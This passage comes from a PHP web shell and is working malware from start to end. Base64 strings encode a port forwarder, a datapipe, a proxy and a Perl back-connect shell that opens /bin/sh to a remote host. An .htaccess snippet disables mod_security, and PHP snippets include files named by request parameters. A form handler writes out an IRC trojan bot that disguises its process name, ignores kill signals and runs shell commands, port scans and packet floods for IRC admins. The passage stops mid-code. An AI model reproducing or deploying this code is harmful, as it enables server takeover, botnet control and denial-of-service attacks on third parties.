+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC 
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn 
+luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT +0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE +UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 +DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS +AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd +GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk +cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 +BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi +AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK +TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg +eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA +oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG +VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI +CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt +b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN +0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG +9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ 
+CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g +aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw +gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG +9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; +$port_bind_bd_cs=""; +$back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0="; 
+$egy_ini="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+"; +$egy_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$egy_vb=""; + + +$egy_cp="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"; + + + + +if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname'])) +{ +$ircadmin=$_POST['ircadmin']; +$ircserver=$_POST['ircserver']; +$ircchan=$_POST['ircchanal']; +$irclabel=$_POST['ircname']; +echo "OverclockiX Shell-Connector || Connecting to $ircserver<title>"; +echo "<body bgcolor=\"black\" text=\"green\">"; +echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>"; +echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>"; +####################################################### +######################IRC Trojan########################## +$file=" +################ CONFIGURACAO ################################################################# +my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # +#----------------------------------------------################################################ +my \$linas_max='48'; # Evita o flood 
:) depois de X linhas # +#----------------------------------------------################################################ +my \$sleep='4'; # ele dorme X segundos # +##################### IRC ##################################################################### +my @adms=(\"$ircadmin\"); # Nick do administrador # +#----------------------------------------------################################################ +my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # +#----------------------------------------------################################################ +my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer # + # aparecer com numero radonamico no final # +#----------------------------------------------################################################ +my \$ircname = 'Linux'; # User ID # +#----------------------------------------------################################################ +chop (my \$realname = `uname -a`); # Full Name # +#----------------------------------------------################################################ +\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # + # caso n?o seja especificado no argumento # +#----------------------------------------------################################################ +my \$porta='6667'; # Porta do servidor de irc # +################ ACESSO A SHELL ############################################################### +my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # +############################################################################################### +my \$VERSAO = '0.2'; +\$SIG{'INT'} = 'IGNORE'; +\$SIG{'HUP'} = 'IGNORE'; +\$SIG{'TERM'} = 'IGNORE'; +\$SIG{'CHLD'} = 'IGNORE'; +\$SIG{'PS'} = 'IGNORE'; +\$SIG{'STOP'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir(\"/\"); +\$servidor=\"\$ARGV[0]\" if \$ARGV[0]; +$0=\"\$processo\".\"\0\"x16;; +my \$pid=fork; +exit if \$pid; +die \"Problema com o fork: $!\" unless 
defined(\$pid); +my \$dcc_sel = new IO::Select->new(); +############################# +# B0tchZ na veia ehehe :P # +############################# + + +\$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my \$socket = \$_[0]; + print \$socket \"\$_[1]\\n\"; + } else { + print \$IRC_cur_socket \"\$_[0]\\n\"; + } +} +################################# +sub conectar { + my \$meunick = \$_[0]; + my \$servidor_con = \$_[1]; + my \$porta_con = \$_[2]; + + + my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); + if (defined(\$IRC_socket)) { + \$IRC_cur_socket = \$IRC_socket; + + + \$IRC_socket->autoflush(1); + \$sel_cliente->add(\$IRC_socket); + + + \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; + \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; + nick(\"\$meunick\"); + sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); + sleep 1; + } +} ##################### + + +my \$line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } + delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); + &DCC::connections; + my @ready = \$sel_cliente->can_read(0); + next unless(@ready); + foreach \$fh (@ready) { + \$IRC_cur_socket = \$fh; + \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; + \$nread = sysread(\$fh, \$msg, 4096); + if (\$nread == 0) { + \$sel_cliente->remove(\$fh); + \$fh->close; + delete(\$irc_servers{\$fh}); + } + @lines = split (/\\n/, \$msg); + + + for(my \$c=0; \$c<= $#lines; \$c++) { + \$line = \$lines[\$c]; + \$line=\$line_temp.\$line if (\$line_temp); + \$line_temp=''; + \$line =~ s/\\r$//; + unless (\$c == $#lines) { + parse(\"\$line\"); + } else { + if ($#lines == 0) { + parse(\"\$line\"); + } elsif (\$lines[\$c] =~ /\\r$/) { + 
parse(\"\$line\"); + } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse(\"\$line\"); + } else { + \$line_temp = \$line; + } + } + } + } +} + + +######################### + + + + +sub parse { + my \$servarg = shift; + if (\$servarg =~ /^PING \:(.*)/) { + sendraw(\"PONG :$1\"); + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my \$pn=$1; my \$onde = $4; my \$args = $5; + if (\$args =~ /^\\001VERSION\\001$/) { + notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); + } + if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { + if (\$onde eq \"\$meunick\"){ + shell(\"\$pn\", \"\$args\"); + } + if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { + my \$natrix = $1; + my \$arg = $2; + if (\$arg =~ /^\!(.*)/) { + ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); + } elsif (\$arg =~ /^\@(.*)/) { + \$ondep = \$onde; + \$ondep = \$pn if \$onde eq \$meunick; + bfunc(\"\$ondep\",\"$1\"); + } else { + shell(\"\$onde\", \"\$arg\"); + } + } + } + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc(\$meunick)) { + \$meunick=$4; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + } + } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { + nick(\"\$meunick\".int rand(9999)); + } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + \$meunick = $2; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; + foreach my \$canal (@canais) { + sendraw(\"JOIN \$canal\"); + } + } +} +########################## + + +sub bfunc { + my \$printl = \$_[0]; + my \$funcarg = \$_[1]; + if (my \$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + if (\$funcarg =~ /^portscan (.*)/) { + my \$hostip=\"$1\"; + my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); + my (@aberta, %porta_banner); + foreach my \$porta (@portas) { + my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => 
\$porta, Proto => 'tcp', Timeout => 4); + if (\$scansock) { + push (@aberta, \$porta); + \$scansock->close; + } + } + + + if (@aberta) { + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); + } else { + sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); + } + } + if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { + my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); + \$dtime = 1 if \$dtime == 0; + my %bytes; + \$bytes{igmp} = $2 * \$pacotes{igmp}; + \$bytes{icmp} = $2 * \$pacotes{icmp}; + \$bytes{o} = $2 * \$pacotes{o}; + \$bytes{udp} = $2 * \$pacotes{udp}; + \$bytes{tcp} = $2 * \$pacotes{tcp}; + + + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); + + + } + exit; + } + } +} +########################## + + + + +sub ircase { + my (\$kem, \$printl, \$case) = @_; + + + + + if (\$case =~ /^join (.*)/) { + j(\"$1\"); + } + if (\$case =~ /^part (.*)/) { + p(\"$1\"); + } + if (\$case =~ /^rejoin\s+(.*)/) { + my \$chan = $1; + if (\$chan =~ /^(\d+) (.*)/) { + for (my \$ca = 1; \$ca <= $1; \$ca++ ) { + p(\"$2\"); + j(\"$2\"); + } + } else { + p(\"\$chan\"); + j(\"\$chan\"); + } + } + if (\$case =~ /^op/) { + op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; + my \$oarg = substr(\$case, 3); + op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^deop/) { + deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; + my \$oarg = substr(\$case, 5); + 
deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^voice/) { + voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; + \$oarg = substr(\$case, 6); + voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^devoice/) { + devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; + \$oarg = substr(\$case, 8); + devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^msg\s+(\S+) (.*)/) { + msg(\"$1\", \"$2\"); + } + if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + msg(\"$2\", \"$3\"); + } + } + if (\$case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp(\"$1\", \"$2\"); + } + if (\$case 